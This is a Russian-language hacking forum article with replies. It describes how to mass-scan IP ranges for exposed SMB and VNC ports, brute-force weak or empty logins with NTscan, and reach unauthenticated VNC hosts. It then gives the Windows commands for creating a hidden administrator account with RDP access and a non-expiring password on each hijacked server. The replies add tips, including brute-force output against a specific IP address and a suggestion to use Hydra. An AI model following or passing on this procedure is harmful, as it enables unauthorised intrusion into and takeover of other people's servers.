Статьи Добудем дедик

Добудем дедик ​

и так приступим .....
Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.

Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его Angry
чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде

Code:

[COLOR=White]ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt[/COLOR]

отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt
Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер Parser
закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt
диапазоны по странам можно смотреть тут Ip rang
теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать
после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов
Для удобства парсинга результатов angry был написан еще 1 парсер качаем его Parser 2
закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900
И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его NTscan
думаю все разберутся как его юзать.
а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его VNCmass
VNCmasss позволит приконектится к бажному VNC деду без авторизации .

Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком


в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку
Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.

Удачного всем брута и скана
Спасибо за внимание .

 

1. Почему в качестве примера везде диапазон локальных адресов?
2. Ну бажный VNC может встретится, а что делать с найденым RDP
3. Можно ещё поискать другие сервисы удалённого администрирования, например Радмин, почему только два?
Резюме:
1. Боян.
2. Тема с@с@к нераскрыта
Вердикт: скорее всего delete (ели не будет дополнений и раскрытия темы)

 

ну да... стать так себе, тема не раскрыта, протсо описание что да как. Таких "статей" в нете как... кароч пусть модеры решают.

 

Описаны конкретные действия, думать ничего не нужно, я благодарен, буду пробовать, я новичок и все понял

 

как же это старо, бажных дедиколв таких уже почти нет

 

многие кто рассуждает о дедах, имеют смутное понятие о них вообще!

 

Зря ты так говоришь я за ночь более 30 к насканиваю

ЗЫ нуль ссесия это не баг для очень умных

Ет ты о чем

 

брутом дедов никогда не занимался, НО не логичнее ли будет для 139 и 135 СНАЧАЛА проверить открытость порта 3389 при помощи того же ipscan.exe, а уже потом брутить, штобы не далать пустую работу ?

 

кто бы че реальное подкинул, а не копипастенные измененные идейки...=\

 

на http://forum.xeka.ru/ эта тема была

 

Нет не проще если открыт порт 3389 то не значит что на нем открыты порты 139,135 .Собственно можно сканить и 3389 сразу но так как таких дедиков гораздо больше это займет больше времени по парсингу и бруту

 

сбрутил НТсканом пару дедиков, пассы не подходят

 

обрати внимение на домен в который входишь ,а если нет выбора доменов то значит юзер не добавлен в группу удаленного админстрирования

 

а как попасть на диапазон айпи именно серверов а не юзеров адсла какого то?

 

подскажите плз, че за трабла??

 

переводи на Promte))

 

у это юзера нет админских прав (т.к. админы могут удалённо коннектиться) + он ещё и не в группе удалённых пользователей.

 

я так понял нтскан перебирает только простые пароли или пустые.
А как сбратить нормальный пароль на дедике?

 

чет я не понимаю
насканил я серв 91.196.253.36
стоит вин 2к3
нтскан пишет

Code:

[91.196.253.36]: ping starting ...
[91.196.253.36]: connecting port 5900 ...
[91.196.253.36]: checking: administrator/[NULL] ...
[91.196.253.36]: checking: admin/[NULL] ...
[91.196.253.36]: checking: guest/[NULL] ...

All done
NTscan v1.0 stopped

и чем его брутить?

 

в папке с нтсканом есть NT_pass.dic в него и вбивай свои пассы

Нт скан не брутит внц портеег , для внц можешь заюзать гидру